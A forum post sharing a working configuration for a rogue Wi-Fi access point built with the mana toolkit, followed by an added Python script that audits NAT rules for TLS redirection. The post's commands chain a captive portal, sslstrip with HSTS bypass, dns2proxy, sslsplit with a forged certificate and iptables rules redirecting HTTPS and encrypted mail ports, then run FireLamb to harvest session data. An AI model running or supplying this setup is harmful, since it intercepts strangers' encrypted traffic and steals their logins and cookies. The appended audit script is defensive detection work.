Posts posted by zakvuil

  1. Hi guys,

    I've got a Pi up and running with the complete setup using mana, nodogsplash and a portal.

    There's a trick to using nodogsplash and redirecting SSL traffic using sslsplit, because nodogsplash modifies the rulebase of iptables. Check out the modified config:

    .

    .

    .

    #Starting Portal
    echo Starting Portal
    service apache2 start
    nodogsplash -f -c ~/mana/run-mana/spot/nodogsplash-portal.conf &
    sleep 5

    #SSLStrip with HSTS bypass
    cd /usr/share/mana-toolkit/sslstrip-hsts/
    python sslstrip.py -l 10080 -a -w /var/www/portals/spot/logs/sslstrip/sslstrip.log&
    python dns2proxy.py $phy&
    cd -


    #SSLSplit
    sslsplit -D -Z -S /var/lib/mana-toolkit/sslsplit -c /var/www/portals/spot/cert/spot-secure.crt -k /var/www/portals/spot/cert/spot-secure.key -O -l /var/www/portals/spot/logs/sslsplit/sslsplit-connect.log \
    https 0.0.0.0 10443 \
    ssl 0.0.0.0 10993 \
    tcp 0.0.0.0 10143 \
    ssl 0.0.0.0 10995 \
    tcp 0.0.0.0 10110 \
    ssl 0.0.0.0 10465 \
    tcp 0.0.0.0 10025&

    iptables -t nat -D PREROUTING 1
    iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 80 -m mark --mark 0x400/0x700 -j REDIRECT --to-port 10080
    iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 443 -m mark --mark 0x400/0x700 -j REDIRECT --to-port 10443
    iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 143 -m mark --mark 0x400/0x700 -j REDIRECT --to-port 10143
    iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 993 -m mark --mark 0x400/0x700 -j REDIRECT --to-port 10993
    iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 465 -m mark --mark 0x400/0x700 -j REDIRECT --to-port 10465
    iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 25 -m mark --mark 0x400/0x700 -j REDIRECT --to-port 10025
    iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 995 -m mark --mark 0x400/0x700 -j REDIRECT --to-port 10995
    iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 110 -m mark --mark 0x400/0x700 -j REDIRECT --to-port 10110
    iptables -t nat -A PREROUTING -i $phy -m mark --mark 0x200/0x700 -j ACCEPT
    iptables -t nat -A PREROUTING -i $phy -m mark --mark 0x400/0x700 -j ACCEPT
    iptables -t nat -A PREROUTING -i $phy -d 0.0.0.0/0 -p tcp --dport 53 -j ACCEPT
    iptables -t nat -A PREROUTING -i $phy -d 0.0.0.0/0 -p udp --dport 53 -j ACCEPT
    iptables -t nat -A PREROUTING -i $phy -d 10.0.0.1 -p tcp --dport 80 -j ACCEPT
    iptables -t nat -A PREROUTING -i $phy -p tcp --dport 80 -j DNAT --to-destination 10.0.0.1:2050
    iptables -t nat -A PREROUTING -i $phy -j ACCEPT

    # Start FireLamb
    ~/mana/run-mana/spot/firelamb.py -i wlan0 -t /var/www/portals/spot/logs/sslsplit/ -s /var/www/portals/spot/logs/sslspl/sslsplit-connect.log&
    echo "Hit enter to kill me"
    read

    .

    .

    .
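
An added example, not part of the original post: a gateway audit that parses NAT rules like the ones above, reports which TLS-protected ports are transparently redirected to a local listener, and evaluates the `--mark value/mask` match the rules rely on. The sample rules are constructed from the post with `$phy` replaced by `wlan0`; all function names are hypothetical.

```python
import shlex

# Constructed sample: a few of the post's rules, with $phy replaced by wlan0.
SAMPLE_RULES = """\
iptables -t nat -A PREROUTING -i wlan0 -p tcp --destination-port 443 -m mark --mark 0x400/0x700 -j REDIRECT --to-port 10443
iptables -t nat -A PREROUTING -i wlan0 -p tcp --destination-port 993 -m mark --mark 0x400/0x700 -j REDIRECT --to-port 10993
iptables -t nat -A PREROUTING -i wlan0 -p tcp --destination-port 80 -m mark --mark 0x400/0x700 -j REDIRECT --to-port 10080
iptables -t nat -A PREROUTING -i wlan0 -m mark --mark 0x200/0x700 -j ACCEPT
iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 80 -j DNAT --to-destination 10.0.0.1:2050
"""

# Ports whose traffic is normally TLS-wrapped end to end.
TLS_PORTS = {443: "HTTPS", 465: "SMTPS", 993: "IMAPS", 995: "POP3S"}

def parse_rule(line):
    """Extract destination port, target, redirect port and mark match from one rule."""
    tok = shlex.split(line)
    rule = {"dport": None, "target": None, "to_port": None, "mark": None}
    for i, t in enumerate(tok[:-1]):
        nxt = tok[i + 1]
        if t in ("--dport", "--destination-port"):
            rule["dport"] = int(nxt)
        elif t == "-j":
            rule["target"] = nxt
        elif t in ("--to-port", "--to-ports"):
            rule["to_port"] = int(nxt)
        elif t == "--mark":
            value, _, mask = nxt.partition("/")
            rule["mark"] = (int(value, 16), int(mask, 16) if mask else 0xFFFFFFFF)
    return rule

def mark_matches(rule, packet_mark):
    """iptables mark match semantics: (packet_mark & mask) == value."""
    if rule["mark"] is None:
        return True
    value, mask = rule["mark"]
    return (packet_mark & mask) == value

def tls_redirects(rules_text):
    """Return (dport, service, local_port, mark) for REDIRECT rules on TLS ports."""
    findings = []
    for line in filter(str.strip, rules_text.splitlines()):
        r = parse_rule(line)
        if r["target"] == "REDIRECT" and r["dport"] in TLS_PORTS:
            findings.append((r["dport"], TLS_PORTS[r["dport"]], r["to_port"], r["mark"]))
    return findings
```

Run against the output of a real gateway's NAT table, any finding means TLS traffic on that port is terminated locally rather than forwarded.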
